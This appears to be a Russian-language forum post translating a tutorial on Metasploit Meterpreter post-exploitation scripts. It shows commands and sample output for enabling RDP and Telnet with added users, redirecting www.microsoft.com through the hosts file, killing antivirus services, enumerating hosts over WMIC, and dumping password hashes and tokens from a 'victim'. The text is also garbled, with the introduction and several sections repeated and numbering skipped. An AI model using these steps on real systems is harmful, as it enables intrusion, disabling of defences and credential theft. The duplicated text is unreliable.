HHIDE_DUMP
Гость
H
HHIDE_DUMP
Гость
Вот сейчас мы пройдемся с начала по Скриптам а потом и до Команд дойдем.
Metasploit поставляется с тоннами полезных скриптов и команд, которые могут помочь вам в исследованиях. Скрипты, как правило, сделаны третьими сторонами и в конечном итоге принимаются в хранилище Subversion. Мы будем рассматривать некоторые из них и описывать их назначения.
Скрипты и команды, указанные ниже, предназначены для использования с оболочкой Meterpreter после успешного получения сессии. После того, как вы получили сессию вы можете использовать эти скрипты и команды, чтобы наилучшим образом действовать в системе.
ССкрипты
1) checkvm
Скрипт под названием “checkvm” которое говорит само за себя предназначен для проверки наличия у цели виртуальных машин, не находится ли цель внутри виртуальной машины:
meterpreter > run checkvm
[*] Checking if SSHACKTHISBOX-0 is a Virtual Machine ........
[*] This is a VMware Workstation/Fusion Virtual Machine
2) getcountermeasure
Скрипт ‘getcountermeasure’ проверяет установки безопасности на целевой системе и может отрубить (мало вероятно)
meterpreter > run getcountermeasure
3) Getgui
‘getgui’ скрипт используется, чтобы включить RDP на целевой системе, если она отключена.
meterpreter > run getgui
Windows Remote Desktop Enabler Meterpreter Script
Usage: getgui -u -p
OPTIONS:
4) get_local_subnets
‘get_local_subnets’ скрипт используется, чтобы получить локальную маску подсети жертвы. Это может оказаться очень полезной информацией, чтобы иметь информацию для действий.
meterpreter > run get_local_subnets
Local subnet: 10.211.55.0/255.255.255.0
5) gettelnet
‘gettelnet’ скрипт используется, чтобы запустить TELNET на целевой машине, если это там отключено.
meterpreter > run gettelnet
Windows Telnet Server Enabler Meterpreter Script
Usage: gettelnet -u -p
OPTIONS:
6) hostsedit
‘hostsedit’ скрипт Meterpreter для добавления записей в файл hosts Windows.
meterpreter > run hostsedit
OPTIONS:
7) killav
‘killav’ скрипт может использоваться, чтобы отключить большинство антивирусных программ (Мало вероятно).
meterpreter > run killav
8) remotewinenum
‘remotewinenum’ скрипт перечислит информацию о системе через wmic на жертве
Я могу предположить, что
Remote Windows Enumeration Meterpreter Script
This script will enumerate windows hosts in the target environment
given a username and password or using the credential under witch
Meterpreter is running using WMI wmic windows native tool.
Usage:
OPTIONS:
10) winenum
Благодаря скрипту‘winenum’ Мы получаем хэш паролей, настройки системы, список пользователей и многое другое
meterpreter > run winenum
Metasploit поставляется с тоннами полезных скриптов и команд, которые могут помочь вам в исследованиях. Скрипты, как правило, сделаны третьими сторонами и в конечном итоге принимаются в хранилище Subversion. Мы будем рассматривать некоторые из них и описывать их назначения.
Скрипты и команды, указанные ниже, предназначены для использования с оболочкой Meterpreter после успешного получения сессии. После того, как вы получили сессию вы можете использовать эти скрипты и команды, чтобы наилучшим образом действовать в системе.
ССкрипты
1) checkvm
Скрипт под названием “checkvm” которое говорит само за себя предназначен для проверки наличия у цели виртуальных машин, не находится ли цель внутри виртуальной машины:
meterpreter > run checkvm
[*] Checking if SSHACKTHISBOX-0 is a Virtual Machine ........
[*] This is a VMware Workstation/Fusion Virtual Machine
2) getcountermeasure
Скрипт ‘getcountermeasure’ проверяет установки безопасности на целевой системе и может отрубить (мало вероятно)
meterpreter > run getcountermeasure
Код:
[*] Running Getcountermeasure on the target...
[*] Checking for contermeasures...
[*] Getting Windows Built in Firewall configuration...
[*]
[*] Domain profile configuration:
[*] --------------------------------------------------------------
[*] Operational mode = Disable
[*] Exception mode = Enable
[*]
[*] Standard profile configuration:
[*] --------------------------------------------------------------
[*] Operational mode = Disable
[*] Exception mode = Enable
[*]
[*] Local Area Connection 6 firewall configuration:
[*] --------------------------------------------------------------
[*] Operational mode = Disable
[*]
[*] Checking DEP Support Policy...
‘getgui’ скрипт используется, чтобы включить RDP на целевой системе, если она отключена.
meterpreter > run getgui
Windows Remote Desktop Enabler Meterpreter Script
Usage: getgui -u -p
OPTIONS:
Код:
-e Enable RDP only.
-h Help menu.
-p The Password of the user to add.
-u The Username of the user to add.
meterpreter > run getgui -e
Код:
[*] Windows Remote Desktop Configuration Meterpreter Script by Darkoperator
[*] Carlos Perez [email protected]
[*] Enabling Remote Desktop
[*] RDP is already enabled
[*] Setting Terminal Services service startup mode
[*] Terminal Services service is already set to auto
[*] Opening port in local firewall if necessary
‘get_local_subnets’ скрипт используется, чтобы получить локальную маску подсети жертвы. Это может оказаться очень полезной информацией, чтобы иметь информацию для действий.
meterpreter > run get_local_subnets
Local subnet: 10.211.55.0/255.255.255.0
5) gettelnet
‘gettelnet’ скрипт используется, чтобы запустить TELNET на целевой машине, если это там отключено.
meterpreter > run gettelnet
Windows Telnet Server Enabler Meterpreter Script
Usage: gettelnet -u -p
OPTIONS:
Код:
-e Enable Telnet Server only.
-h Help menu.
-p The Password of the user to add.
-u The Username of the user to add.
meterpreter > run gettelnet -e
[*] Windows Telnet Server Enabler Meterpreter Script
[*] Setting Telnet Server Services service startup mode
[*] The Telnet Server Services service is not set to auto, changing it to auto ...
[*] Opening port in local firewall if necessary
‘hostsedit’ скрипт Meterpreter для добавления записей в файл hosts Windows.
meterpreter > run hostsedit
OPTIONS:
Код:
-e Host entry in the format of IP,Hostname.
-h Help Options.
-l Text file with list of entries in the format of IP,Hostname. One per line.
Example:
run hostsedit -e 127.0.0.1,google.com
run hostsedit -l /tmp/fakednsentries.txt
meterpreter > run hostsedit -e 10.211.55.162,www.microsoft.com
[*] Making Backup of the hosts file.
[*] Backup loacated in C:\WINDOWS\System32\drivers\etc\hosts62497.back
[*] Adding Record for Host www.microsoft.com with IP 10.211.55.162
[*] Clearing the DNS Cache
‘killav’ скрипт может использоваться, чтобы отключить большинство антивирусных программ (Мало вероятно).
meterpreter > run killav
Код:
[*] Killing Antivirus services on the target...
[*] Killing off cmd.exe...
‘remotewinenum’ скрипт перечислит информацию о системе через wmic на жертве
Я могу предположить, что
Код:
-u administrator -p ihazpassword -t 10.211.55.128
-u administrator Имя пользователя
-p ihazpassword Пароль пользователя
-t 10.211.55.128. Адресс в сети
meterpreter > run remotewinenum
Remote Windows Enumeration Meterpreter Script
This script will enumerate windows hosts in the target environment
given a username and password or using the credential under witch
Meterpreter is running using WMI wmic windows native tool.
Usage:
OPTIONS:
Код:
-h Help menu.
-p Password of user on target system
-t The target address
-u User on the target system (If not provided it will use credential of process)
meterpreter > run remotewinenum -u administrator -p ihazpassword -t 10.211.55.128
[*] Saving report to /root/.msf4/logs/remotewinenum/10.211.55.128_20090711.0142
[*] Running WMIC Commands ....
[*] running command wimic environment list
[*] running command wimic share list
[*] running command wimic nicconfig list
[*] running command wimic computersystem list
[*] running command wimic useraccount list
[*] running command wimic group list
[*] running command wimic sysaccount list
[*] running command wimic volume list brief
[*] running command wimic logicaldisk get description,filesystem,name,size
[*] running command wimic netlogin get name,lastlogon,badpasswordcount
[*] running command wimic netclient list brief
[*] running command wimic netuse get name,username,connectiontype,localname
[*] running command wimic share get name,path
[*] running command wimic nteventlog get path,filename,writeable
[*] running command wimic service list brief
[*] running command wimic process list brief
[*] running command wimic startup list full
[*] running command wimic rdtoggle list
[*] running command wimic product get name,version
[*] running command wimic qfe list
Благодаря скрипту‘winenum’ Мы получаем хэш паролей, настройки системы, список пользователей и многое другое
meterpreter > run winenum
Код:
[*] Running Windows Local Enumerion Meterpreter Script
[*] New session on 10.211.55.128:4444...
[*] Saving report to /root/.msf4/logs/winenum/10.211.55.128_20090711.0514-99271/10.211.55.128_20090711.0514-99271.txt
[*] Checking if SSHACKTHISBOX-0 is a Virtual Machine ........
[*] This is a VMware Workstation/Fusion Virtual Machine
[*] Running Command List ...
[*] running command cmd.exe /c set
[*] running command arp -a
[*] running command ipconfig /all
[*] running command ipconfig /displaydns
[*] running command route print
[*] running command net view
[*] running command netstat -nao
[*] Extracting software list from registry
[*] Finished Extraction of software list from registry
[*] Dumping password hashes...
[*] Hashes Dumped
[*] Getting Tokens...
[*] All tokens have been processed
[*] Done!